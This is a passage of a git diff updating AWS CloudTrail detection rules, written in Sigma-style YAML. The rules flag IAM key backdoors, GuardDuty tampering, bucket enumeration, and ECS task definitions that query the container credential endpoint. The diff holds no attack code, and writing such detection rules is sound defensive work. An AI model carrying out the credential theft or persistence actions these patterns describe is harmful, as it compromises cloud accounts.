current region. + Disabling default encryption does not change the encryption status of your existing volumes. +references: + - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html author: Sittikorn S date: 2021/06/29 modified: 2021/08/20 -references: - - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: - attack.impact - attack.t1486 diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml b/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml index 730abebc6..8a1715454 100644 --- a/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml @@ -1,12 +1,17 @@ title: AWS EC2 Startup Shell Script Change id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df -status: experimental +status: test description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 author: faloker date: 2020/02/12 modified: 2022/06/07 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__startup_shell_script/main.py#L9 +tags: + - attack.execution + - attack.t1059.001 + - attack.t1059.003 + - attack.t1059.004 logsource: product: aws service: cloudtrail @@ -19,8 +24,3 @@ detection: falsepositives: - Valid changes to the startup script level: high -tags: - - attack.execution - - attack.t1059.001 - - attack.t1059.003 - - attack.t1059.004 diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml b/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml index 973cf9dc5..7b4a0e5da 100644 --- a/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml @@ -1,29 +1,29 @@ title: AWS EC2 VM Export Failure id: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b -status: experimental +status: test description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. +references: + - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance author: Diogo Braz date: 2020/04/16 -modified: 2021/08/20 -references: - - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance +modified: 2022/10/05 +tags: + - attack.collection + - attack.t1005 + - attack.exfiltration + - attack.t1537 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection: - eventName: 'CreateInstanceExportTask' - eventSource: 'ec2.amazonaws.com' - filter1: - errorMessage: '*' - filter2: - errorCode: '*' - filter3: - responseElements|contains: 'Failure' - condition: selection and (filter1 or filter2 or filter3) + selection: + eventName: 'CreateInstanceExportTask' + eventSource: 'ec2.amazonaws.com' + filter1: + errorMessage|contains: '*' + filter2: + errorCode|contains: '*' + filter3: + responseElements|contains: 'Failure' + condition: selection and not 1 of filter* level: low -tags: -- attack.collection -- attack.t1005 -- attack.exfiltration -- attack.t1537 diff --git a/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml b/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml new file mode 100644 index 000000000..09eac93ac --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml @@ -0,0 +1,31 @@ +title: AWS ECS Task Definition That Queries The Credential Endpoint +id: b94bf91e-c2bf-4047-9c43-c6810f43baad +status: test +description: | + Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. + This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py + - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html + - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html +author: Darin Smith +date: 2022/06/07 +modified: 2023/04/24 +tags: + - attack.persistence + - attack.t1525 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'ecs.amazonaws.com' + eventName: + - 'DescribeTaskDefinition' + - 'RegisterTaskDefinition' + - 'RunTask' + requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' + condition: selection +falsepositives: + - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml index fac7b591d..d4df9c3cf 100644 --- a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml @@ -1,11 +1,17 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef -status: experimental -description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. -author: Austin Songer @austinsonger -date: 2021/08/15 +status: test +description: | + Detects when a EFS Fileshare is modified or deleted. + You can't delete a file system that is in use. + If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html +author: Austin Songer @austinsonger +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.impact logsource: product: aws service: cloudtrail @@ -17,5 +23,3 @@ detection: falsepositives: - Unknown level: medium -tags: - - attack.impact diff --git a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml index 59b3e7304..da66ea29a 100644 --- a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -1,11 +1,15 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 -status: experimental +status: test description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. -author: Austin Songer @austinsonger -date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html +author: Austin Songer @austinsonger +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 logsource: product: aws service: cloudtrail @@ -17,6 +21,3 @@ detection: falsepositives: - Unknown level: medium -tags: - - attack.impact - - attack.t1485 diff --git a/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml index 49b53b0a6..241835475 100644 --- a/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml @@ -1,11 +1,15 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +status: test description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://any-api.com/amazonaws_com/eks/docs/API_Description +author: Austin Songer +date: 2021/08/16 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 logsource: product: aws service: cloudtrail @@ -16,11 +20,8 @@ detection: - CreateCluster - DeleteCluster condition: selection -level: low -tags: - - attack.impact - - attack.t1485 falsepositives: - - EKS Cluster being created or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - EKS Cluster being created or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml index 51ec4468c..415f69cb1 100644 --- a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml +++ b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml @@ -1,12 +1,16 @@ title: AWS ElastiCache Security Group Created id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 +status: test description: Detects when an ElastiCache security group has been created. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1136 + - attack.t1136.003 logsource: product: aws service: cloudtrail @@ -15,10 +19,8 @@ detection: eventSource: elasticache.amazonaws.com eventName: 'CreateCacheSecurityGroup' condition: selection -level: low -tags: - - attack.persistence - - attack.t1136 - - attack.t1136.003 falsepositives: -- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml index 0ee02e0f6..8c162d317 100644 --- a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml @@ -1,12 +1,15 @@ title: AWS ElastiCache Security Group Modified or Deleted id: 7c797da2-9cf2-4523-ba64-33b06339f0cc +status: test description: Identifies when an ElastiCache security group has been modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1531 logsource: product: aws service: cloudtrail @@ -20,9 +23,8 @@ detection: - 'AuthorizeCacheSecurityGroupEgress' - 'RevokeCacheSecurityGroupEgress' condition: selection -level: low -tags: - - attack.impact - - attack.t1531 falsepositives: -- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml b/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml new file mode 100644 index 000000000..9b14c04d3 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml @@ -0,0 +1,30 @@ +title: Potential Bucket Enumeration on AWS +id: f305fd62-beca-47da-ad95-7690a0620084 +related: + - id: 4723218f-2048-41f6-bcb0-417f2d784f61 + type: similar +status: test +description: Looks for potential enumeration of AWS buckets via ListBuckets. +references: + - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md + - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html + - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ +author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +date: 2023/01/06 +modified: 2023/04/28 +tags: + - attack.discovery + - attack.t1580 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 's3.amazonaws.com' + eventName: 'ListBuckets' + filter: + type: 'AssumedRole' + condition: selection and not filter +falsepositives: + - Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml b/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml index 259414a9f..b81f188c4 100644 --- a/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml +++ b/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml @@ -1,12 +1,15 @@ title: AWS GuardDuty Important Change id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 -status: experimental +status: test description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 author: faloker date: 2020/02/11 -modified: 2021/08/09 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/guardduty__whitelist_ip/main.py#L9 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail @@ -18,6 +21,3 @@ detection: falsepositives: - Valid change in the GuardDuty (e.g. to ignore internal scanners) level: high -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml b/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml index 0d7cd569a..085d768cf 100644 --- a/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml +++ b/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml @@ -1,12 +1,18 @@ title: AWS IAM Backdoor Users Keys id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 -status: experimental -description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. +status: test +description: | + Detects AWS API key creation for a user by another user. + Backdoored users can be used to obtain persistence in the AWS environment. + Also with this alert, you can detect a flow of AWS keys in your org. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__backdoor_users_keys/main.py +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 logsource: product: aws service: cloudtrail @@ -26,6 +32,3 @@ falsepositives: - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming) - AWS API keys legitimate exchange workflows level: medium -tags: - - attack.persistence - - attack.t1098 diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml new file mode 100644 index 000000000..6755f3547 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml @@ -0,0 +1,27 @@ +title: AWS IAM S3Browser LoginProfile Creation +id: db014773-b1d3-46bd-ba26-133337c0ffee +status: experimental +description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. +references: + - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor +author: daniel.bohannon@permiso.io (@danielhbohannon) +date: 2023/05/17 +tags: + - attack.execution + - attack.persistence + - attack.t1059.009 + - attack.t1078.004 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'iam.amazonaws.com' + eventName: + - 'GetLoginProfile' + - 'CreateLoginProfile' + userAgent|contains: 'S3 Browser' + condition: selection +falsepositives: + - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation +level: high diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml new file mode 100644 index 000000000..3f38039a2 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml @@ -0,0 +1,30 @@ +title: AWS IAM S3Browser Templated S3 Bucket Policy Creation +id: db014773-7375-4f4e-b83b-133337c0ffee +status: experimental +description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "". +references: + - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor +author: daniel.bohannon@permiso.io (@danielhbohannon) +date: 2023/05/17 +modified: 2023/05/17 +tags: + - attack.execution + - attack.t1059.009 + - attack.persistence + - attack.t1078.004 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: iam.amazonaws.com + eventName: PutUserPolicy + userAgent|contains: 'S3 Browser' + requestParameters|contains|all: + - '"arn:aws:s3:::/*"' + - '"s3:GetObject"' + - '"Allow"' + condition: selection +falsepositives: + - Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value +level: high diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml new file mode 100644 index 000000000..e4e9323a4 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml @@ -0,0 +1,27 @@ +title: AWS IAM S3Browser User or AccessKey Creation +id: db014773-d9d9-4792-91e5-133337c0ffee +status: experimental +description: Detects S3 Browser utility creating IAM User or AccessKey. +references: + - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor +author: daniel.bohannon@permiso.io (@danielhbohannon) +date: 2023/05/17 +tags: + - attack.execution + - attack.persistence + - attack.t1059.009 + - attack.t1078.004 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'iam.amazonaws.com' + eventName: + - 'CreateUser' + - 'CreateAccessKey' + userAgent|contains: 'S3 Browser' + condition: selection +falsepositives: + - Valid usage of S3 Browser for IAM User and/or AccessKey creation +level: high diff --git a/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml b/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml index c8d356615..f7b05b387 100644 --- a/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml +++ b/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml @@ -1,30 +1,27 @@ title: AWS Glue Development Endpoint Activity id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +status: test description: Detects possible suspicious glue development endpoint activity. -author: Austin Songer @austinsonger -status: experimental -date: 2021/10/03 -modified: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html +author: Austin Songer @austinsonger +date: 2021/10/03 +modified: 2022/12/18 +tags: + - attack.privilege_escalation logsource: product: aws service: cloudtrail detection: - selection1: - eventSource: glue.amazonaws.com - eventName: CreateDevEndpoint - selection2: - eventSource: glue.amazonaws.com - eventName: DeleteDevEndpoint - selection3: - eventSource: glue.amazonaws.com - eventName: UpdateDevEndpoint - condition: selection1 or selection2 or selection3 -level: low -tags: - - attack.privilege_escalation + selection: + eventSource: 'glue.amazonaws.com' + eventName: + - 'CreateDevEndpoint' + - 'DeleteDevEndpoint' + - 'UpdateDevEndpoint' + condition: selection falsepositives: - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml b/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml index 161c07abb..c3b990d9d 100644 --- a/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml +++ b/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml @@ -1,24 +1,24 @@ title: AWS RDS Master Password Change id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 -status: experimental +status: test description: Detects the change of database master password. It may be a part of data exfiltration. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +modified: 2022/10/05 +tags: + - attack.exfiltration + - attack.t1020 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: rds.amazonaws.com - responseElements.pendingModifiedValues.masterUserPassword: '*' + responseElements.pendingModifiedValues.masterUserPassword|contains: '*' eventName: ModifyDBInstance condition: selection_source falsepositives: - Benign changes to a db instance level: medium -tags: - - attack.exfiltration - - attack.t1020 diff --git a/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml b/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml index dbc413919..597a66a6f 100644 --- a/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml +++ b/src/main/resources/rules/cloudtrail/aws_rds_public_db_restore.yml @@ -1,12 +1,15 @@ title: Restore Public AWS RDS Instance id: c3f265c7-ff03-4056-8ab2-d486227b4599 -status: experimental +status: test description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1020 logsource: product: aws service: cloudtrail @@ -19,6 +22,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.exfiltration - - attack.t1020 diff --git a/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml b/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml index 14bbc35e5..5470622d7 100644 --- a/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml +++ b/src/main/resources/rules/cloudtrail/aws_root_account_usage.yml @@ -1,24 +1,24 @@ title: AWS Root Credentials id: 8ad1600d-e9dc-4251-b0ee-a65268f29add -status: experimental +status: test description: Detects AWS root account usage +references: + - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html author: vitaliy0x1 date: 2020/01/21 -modified: 2021/08/09 -references: - - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html +modified: 2022/10/09 +tags: + - attack.privilege_escalation + - attack.t1078.004 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection_usertype: - userIdentity.type: Root - selection_eventtype: - eventType: AwsServiceEvent - condition: selection_usertype and not selection_eventtype + selection_usertype: + userIdentity.type: Root + selection_eventtype: + eventType: AwsServiceEvent + condition: selection_usertype and not selection_eventtype falsepositives: - - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html + - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html level: medium -tags: - - attack.privilege_escalation - - attack.t1078.004 diff --git a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml index 9e6219023..bf738eff0 100644 --- a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml +++ b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml @@ -1,13 +1,18 @@ title: AWS Route 53 Domain Transfer Lock Disabled id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 +status: test description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. -author: Elastic, Austin Songer @austinsonger -status: experimental -date: 2021/07/22 references: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html +author: Elastic, Austin Songer @austinsonger +date: 2021/07/22 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 logsource: product: aws service: cloudtrail @@ -16,10 +21,6 @@ detection: eventSource: route53.amazonaws.com eventName: DisableDomainTransferLock condition: selection -level: low -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 falsepositives: -- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml index 69302a914..599badbcd 100644 --- a/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml +++ b/src/main/resources/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml @@ -1,11 +1,16 @@ title: AWS Route 53 Domain Transferred to Another Account id: b056de1a-6e6e-4e40-a67e-97c9808cf41b +status: test description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. +references: + - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml author: Elastic, Austin Songer @austinsonger -status: experimental date: 2021/07/22 -references: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +modified: 2022/10/09 +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 logsource: product: aws service: cloudtrail @@ -14,10 +19,6 @@ detection: eventSource: route53.amazonaws.com eventName: TransferDomainToAnotherAwsAccount condition: selection -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 falsepositives: -- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low diff --git a/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml b/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml index 2080b16d0..393dbbc73 100644 --- a/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml +++ b/src/main/resources/rules/cloudtrail/aws_s3_data_management_tampering.yml @@ -1,10 +1,7 @@ title: AWS S3 Data Management Tampering -id: 78b3756a-7804-4ef7-8555-7b9024a02d2d +id: 78b3756a-7804-4ef7-8555-7b9024a02e2d +status: test description: Detects when a user tampers with S3 data management in Amazon Web Services. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html @@ -13,6 +10,12 @@ references: - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1537 logsource: product: aws service: cloudtrail @@ -20,17 +23,14 @@ detection: selection: eventSource: s3.amazonaws.com eventName: - - PutBucketLogging - - PutBucketWebsite - - PutEncryptionConfiguration - - PutLifecycleConfiguration - - PutReplicationConfiguration - - ReplicateObject - - RestoreObject + - PutBucketLogging + - PutBucketWebsite + - PutEncryptionConfiguration + - PutLifecycleConfiguration + - PutReplicationConfiguration + - ReplicateObject + - RestoreObject condition: selection -level: low -tags: - - attack.exfiltration - - attack.t1537 falsepositives: -- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml b/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml index 2a5361e0f..a32ca6486 100644 --- a/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml +++ b/src/main/resources/rules/cloudtrail/aws_securityhub_finding_evasion.yml @@ -2,10 +2,10 @@ title: AWS SecurityHub Findings Evasion id: a607e1fe-74bf-4440-a3ec-b059b9103157 status: stable description: Detects the modification of the findings on 